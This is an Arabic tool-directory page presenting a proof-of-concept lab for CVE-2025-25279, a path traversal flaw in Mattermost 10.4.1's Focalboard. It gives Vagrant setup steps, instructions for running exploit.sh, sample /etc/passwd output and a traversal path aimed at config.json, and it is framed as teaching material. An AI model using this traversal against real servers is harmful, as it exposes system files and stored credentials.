Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-25279-Mattermost-Path-Traversal — إثبات مفهوم لاستغلال CVE-2025-25279، وهي ثغرة اجتياز المسار في وحدة Focalboard الخاصة بـ Mattermost 10.4.1، مما يتيح تسريب ملفات عشوائية للمستخدمين المصادق عليهم عبر مرفقات مصممة. | Kitploit
أدوات/GitHubGitHub/abokormahammadmousse/cve-2025-25279-mattermost-path-traversal
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليممختبرات وتدريب عملي
GitHubabokormahammadmousse/cve-2025-25279-mattermost-path-traversal

CVE-2025-25279-Mattermost-Path-Traversal

إثبات مفهوم لاستغلال CVE-2025-25279، وهي ثغرة اجتياز المسار في وحدة Focalboard الخاصة بـ Mattermost 10.4.1، مما يتيح تسريب ملفات عشوائية للمستخدمين المصادق عليهم عبر مرفقات مصممة.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
منذ 3 أشهرلم تتم المراجعة بعد

🔥 CVE-2025-25279 — Mattermost 10.4.1

📤 تجاوز المسار في Focalboard يتيح استخراج الملفات

🌟 مقدمة

تُظهر هذه الإثبات العملي استغلال الثغرة CVE-2025-25279 التي تؤثر على Mattermost 10.4.1.
يسمح وجود خلل في Focalboard (وحدة إدارة اللوحات) بـ قراءة عشوائية للملفات عبر تجاوز المسار في المرفقات.

يُمكّن الاستغلال من استخراج:

  • /etc/passwd
  • /etc/group
  • أو ملفات حساسة لـ Mattermost، على سبيل المثال:
    opt/mattermost/config/config.json

يعمل الهجوم فقط باستخدام حساب مستخدم مُصادق عليه في السيناريوهات الضعيفة.


🗂️ تنظيم الدلائل

  • 📁 target : دليل إنشاء الصندوق الهدف
  • 📁 live : دليل إنشاء الأجهزة الافتراضية الهدف وعرض الاستغلال
  • 📁 src : كود مصدر مساعد (إن وُجد)
  • 📁 refs : دليل يحوي المقالات والمراجع
  • 📁 docs : المستندات المرتبطة المُنتجة أثناء المشروع، بما في ذلك التسجيلات المرئية

🔧 المتطلبات الأساسية

  • Vagrant
  • VirtualBox
  • مجموعة ملفات المشروع (target + live)
  • حساب Mattermost (PAT = Personal Access Token)
  • لينكس/ماك/ويندوز مع Bash

📦 تحميل Mattermost

المجلد target/ غير مضمن (كبير جدًا لـ GitHub).

حمّله يدويًا من: https://releases.mattermost.com/10.4.1/mattermost-10.4.1-linux-amd64.tar.gz

ثم ضع الملف في: target

قبل نشر الجهاز الافتراضي

أولاً، اذهب إلى دليل target ونفّذ:

root@kitploit:~
cd target
make mattermost.box

تأكد من وجود box mattermost-poc وإلا لن يعمل الجهاز الافتراضي:

root@kitploit:~
cd cve-2025-25279-mattermost
vagrant box add mattermost-poc target/mattermost.box

1. نشر الجهاز الهدف الضعيف

تشغيل الجهاز الافتراضي

root@kitploit:~
cd live/vm1
vagrant up

الاتصال بالجهاز الافتراضي

root@kitploit:~
 vagrant ssh

إنشاء مستخدم في الواجهة الويب:

افتح: http://localhost:8065

إنشاء رمز مميز في واجهة المستخدم:

الملف الشخصي --> الأمان --> رموز الوصول الشخصية

2. تثبيت الاستغلال

من الجهاز المضيف:

root@kitploit:~
cd live/share
sudo apt-get update -y
sudo apt-get install -y unzip

chmod +x exploit.sh

3. تنفيذ الاستغلال

root@kitploit:~
./exploit.sh

سيُطلب منك:

root@kitploit:~
PAT (Personal Access Token) :

👉 أدخل رمز PAT صالحًا لمستخدم Mattermost.

📸 مثال على المخرجات (استخراج /etc/passwd)

root@kitploit:~
===== CONTENU (début) =====
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
...
mattermost:x:999:996::/opt/mattermost:/bin/sh

الملف المستهدف: config.json

لاستهداف ملف Mattermost حساس:

عدّل في أعلى السكربت exploit.sh:

root@kitploit:~
TARGET_SUFFIX="opt/mattermost/config/config.json"
TRAVERSAL_PATH='../../../../../../../opt/mattermost/config/config.json'
سيعرض الاستغلال بعد ذلك محتوى ملف config.json.

✒️ المؤلفون

🟢 محمد موسى أبو بكر 🔵 سيريل بارنيه

🎬 عرض فيديو

👉 يوجد عرض توضيحي كامل بالفيديو في: live/Démonstration/video-poc-cve-2025-25279.mp4

🧩 ملاحظات

هذا الإثبات العملي مخصص فقط لبيئات التعلم. لا يُستخدم أبدًا خارج الإطار التعليمي أو بدون إذن.

تنزيل الأداة